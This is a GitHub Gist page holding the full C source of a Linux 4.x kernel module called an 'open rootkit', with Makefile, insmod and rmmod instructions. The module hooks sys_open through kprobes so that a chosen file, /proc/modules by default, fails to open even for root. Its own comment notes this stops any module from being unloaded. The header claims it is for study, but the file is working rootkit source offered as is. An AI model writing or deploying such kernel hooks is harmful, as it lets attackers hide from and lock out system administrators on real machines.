Last active
June 9, 2025 23:32
-
-
Save inso-/d9798bd91685ddd00433 to your computer and use it in GitHub Desktop.
Linux 4.X Kernel Rootkit Open
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * open_rootkit.c - Thomas Moussajee | |
| * C Unix Rootkit open | |
| * Make a file forbiden for everyone include root with permission | |
| * HOW TO COMPILE : create a Makefile, make | |
| * exemple of Makeflle : | |
| + KERNELDIR ?= /lib/modules/$(shell uname -r)/build | |
| + PWD := $(shell pwd) | |
| + NAME = rootkit.ko | |
| + all: $(NAME) | |
| + $(NAME): | |
| + $(MAKE) -C $(KERNELDIR) M=$(PWD) modules | |
| * HOW TO LOAD ON A KERNEL : insmod rootkit.ko | |
| * HOW TO UNLOAD ON A KERNEL : rmmod rootkit.ko | |
| * Warning the default forbiden file is "proc/modules", you will not be able to unload any module ;) | |
| * You can change the forbiden file | |
| * CREATE FOR STUDY DO NOT USE THIS ROOTKIT as a "virus" | |
| */ | |
| #include <linux/init.h> | |
| #include <linux/kernel.h> | |
| #include <linux/module.h> | |
| #include <linux/types.h> | |
| #include <linux/syscalls.h> | |
| #include <asm/uaccess.h> | |
| #include <asm/cacheflush.h> | |
| #include <linux/delay.h> | |
| #include <linux/fcntl.h> | |
| #include <linux/kprobes.h> | |
| #include <asm/uaccess.h> | |
| #define FORBIDEN_FILE "/proc/modules" | |
| int init_module(void); | |
| void cleanup_module(void); | |
| MODULE_LICENSE("GPL"); | |
| MODULE_AUTHOR("THOMAS MOUSSAJEE"); | |
| MODULE_DESCRIPTION("KERNEL OPEN ROOTKIT"); | |
| static char hidden; | |
| asmlinkage long new_sys_open(const char __user *filename, int flags, umode_t mode) | |
| { | |
| if (strcmp(filename, FORBIDEN_FILE) == 0) | |
| hidden = 1; | |
| else | |
| hidden = 0; | |
| jprobe_return(); | |
| return 0; | |
| } | |
| static int open_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs) | |
| { | |
| if (hidden) | |
| { | |
| regs->ax = -1; | |
| } | |
| return 0; | |
| } | |
| static struct jprobe my_jprobe = { | |
| .entry= new_sys_open, | |
| .kp = { | |
| .symbol_name = "sys_open", | |
| }, | |
| }; | |
| static struct kretprobe mprotect_kretprobe = | |
| { | |
| .handler = open_ret_handler, | |
| .maxactive = 100 | |
| }; | |
| int init_module(void) | |
| { | |
| int ret = 0; | |
| hidden = 0; | |
| ret = register_jprobe(&my_jprobe); | |
| mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_open"); | |
| register_kretprobe(&mprotect_kretprobe); | |
| return ret; | |
| } | |
| void cleanup_module(void) | |
| { | |
| unregister_jprobe(&my_jprobe); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment